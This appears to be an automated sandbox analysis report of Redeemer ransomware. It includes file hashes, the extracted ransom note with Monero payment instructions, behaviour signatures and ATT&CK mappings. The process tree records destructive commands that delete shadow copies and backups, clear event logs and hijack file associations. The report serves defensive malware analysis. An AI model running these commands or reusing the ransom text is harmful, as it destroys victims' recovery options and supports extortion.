Analysis

  • max time kernel
    148s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    19-10-2021 19:56

General

  • Target

    sqlsrvr.exe

  • Size

    1.8MB

  • MD5

    e1338c42da2d2363afbbd0eeabad1ca9

  • SHA1

    fe5d669b732c9227bb25787083906f49b732c335

  • SHA256

    61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

  • SHA512

    bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

Malware Config

Extracted

Path

C:\Read Me.TXT

Ransom Note
8888888b. 888 888 Y88b 888 888 888 888 888 d88P .d88b. .d88888 .d88b. .d88b. 88888b.d88b. .d88b. 888d888 8888888P" d8P Y8b d88" 888 d8P Y8b d8P Y8b 888 "888 "88b d8P Y8b 888P" 888 T88b 88888888 888 888 88888888 88888888 888 888 888 88888888 888 888 T88b Y8b. Y88b 888 Y8b. Y8b. 888 888 888 Y8b. 888 888 T88b "Y8888 "Y88888 "Y8888 "Y8888 888 888 888 "Y8888 888 Made by Cerebrate - Dread Forums TOR [http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/] [Q1] What happened, I cannot open my files and they have an odd extension? [A1] Your files have been encrypted by Redeemer, a new ransomware operation. [Q2] Is there any way to recover my files? [A2] Yes, you can recover your files. This will however cost you money in XMR (Monero). [Q3] Is there any any way to recover my files without paying? [A3] Without paying it is impossible your files. Redeemer uses most secure algorithms and a sophisticated encryption scheme which guarantees security. Without a proper key, you will never regain access to your files. [Q4] What is XMR (Monero)? [A4] It is a privacy oriented cryptocurrency. You can learn more about Monero on getmonero.org. You can view ways to purchase it on www.monero.how/how-to-buy-monero. [Q5] How will I decrypt my files? [A5] Follow the general instructions: -1. Buy 02 XMR. -2. Contact helpdecryptmyfiles@yandex.com and send the following key: -----BEGIN REDEEMER PUBLIC KEY----- MDOJ4SNegjzjos0DR8AZPMS2fhoBbCYNI6DkHo0KpjT7I0w9tF Em+Tem8spf8YpVrmN1CFm6zN1PgnMTLg07grAd6Bx9Q2KZUZK0 4tyGKy9g56Mn4/cSGBKSN2J7wHnk8/U3+z7F9R+WyQd4VAQqPz aD6vrs3j6kJHOIVarV2yhDiAaQvw6z8ZJWTcC7/1oJ7RA1Qhco Fw35kICAJK9+UqMkUZp4bbC2+diaiy6mi6YCHb8yNkv4WzrX5N MmCha0ZEE1RAv0fb44D2OjvJx2e/DdzHjuiOSdosF4uyq/pN+0 p2NA2Qa+7CerttH35eByXP0SIS3bp2gY2VJmPh+5lRm9Xc63rw 2+j+KzbMuWQfeKHwe4PVpxapiGSupELnZCft1ZifIm6Soizj2W UWFjJJw721HvBQl9nvEmTawghHBxE+PXJgUJi/ENqz9+vgPC2K HusiGs4QPt4OT/BahWLNW2bXj2uQfiw8OgugageNXHb2GM+rT7 Hg1eTaD8J1xE/1HiaxlQjJLFY1ywZtx4p1FcvgRaJNlmag4Nxb hy7e0cmGScrrSPcCysGjKQiEpqU2Bktop3N5eaKTLOFzQHRz3p asFA0VdKneojvAor8vyKqlJChLcAQMr2xKKskJgb693fcouZ4I hDSpHxwqoKOZDe7H0U3YBcKH0u/SEGiEa12w== -----END REDEEMER PUBLIC KEY----- -3. You will receive an XMR address where you will need to pay the requested amount of Monero. -4. After you pay and the payment is verified, you will receive a decryption tool and a key which will restore all your files and your computer back to normal.
Emails

helpdecryptmyfiles@yandex.com

Signatures

  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 17 IoCs
  • Modifies WinLogon 2 TTPs 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sqlsrvr.exe
    "C:\Users\Admin\AppData\Local\Temp\sqlsrvr.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Windows\TEST_\calc.exe
      "C:\Windows\TEST_\calc.exe" C:\Users\Admin\AppData\Local\Temp\sqlsrvr.exe
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Deletes itself
      • Drops desktop.ini file(s)
      • Modifies WinLogon
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c vssadmin delete shadows /All /Quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin delete shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:1168
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Application
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Application
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1572
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Security
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Security
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1376
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Setup
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Setup
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:284
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log System
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log System
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1224
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
        3⤵
          PID:876
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wbadmin delete systemstatebackup -deleteoldest -quiet
          3⤵
            PID:1152
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ftype redeemer="C:\Windows\system32\cmd.exe" /c msg * Redeemer Ransowmare - this file cannot be opened until decrypted. Check ReadMe.TXT for more details how to decrypt your file.
            3⤵
            • Modifies registry class
            PID:932
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c assoc .redeem=redeemer
            3⤵
            • Modifies registry class
            PID:1912
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1560

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Winlogon Helper DLL

      1
      T1004

      Defense Evasion

      Indicator Removal on Host

      1
      T1070

      File Deletion

      2
      T1107

      Modify Registry

      1
      T1112

      Credential Access

      Credentials in Files

      1
      T1081

      Discovery

      System Information Discovery

      1
      T1082

      Collection

      Data from Local System

      1
      T1005

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\TEST_\calc.exe
        MD5

        e1338c42da2d2363afbbd0eeabad1ca9

        SHA1

        fe5d669b732c9227bb25787083906f49b732c335

        SHA256

        61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

        SHA512

        bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

      • \Windows\TEST_\calc.exe
        MD5

        e1338c42da2d2363afbbd0eeabad1ca9

        SHA1

        fe5d669b732c9227bb25787083906f49b732c335

        SHA256

        61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

        SHA512

        bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

      • memory/284-66-0x0000000000000000-mapping.dmp
      • memory/876-69-0x0000000000000000-mapping.dmp
      • memory/932-71-0x0000000000000000-mapping.dmp
      • memory/1116-59-0x0000000000000000-mapping.dmp
      • memory/1152-70-0x0000000000000000-mapping.dmp
      • memory/1168-60-0x0000000000000000-mapping.dmp
      • memory/1224-68-0x0000000000000000-mapping.dmp
      • memory/1336-61-0x0000000000000000-mapping.dmp
      • memory/1376-64-0x0000000000000000-mapping.dmp
      • memory/1404-65-0x0000000000000000-mapping.dmp
      • memory/1444-56-0x0000000000000000-mapping.dmp
      • memory/1556-54-0x00000000757B1000-0x00000000757B3000-memory.dmp
        Filesize

        8KB

      • memory/1572-62-0x0000000000000000-mapping.dmp
      • memory/1636-67-0x0000000000000000-mapping.dmp
      • memory/1640-63-0x0000000000000000-mapping.dmp
      • memory/1912-72-0x0000000000000000-mapping.dmp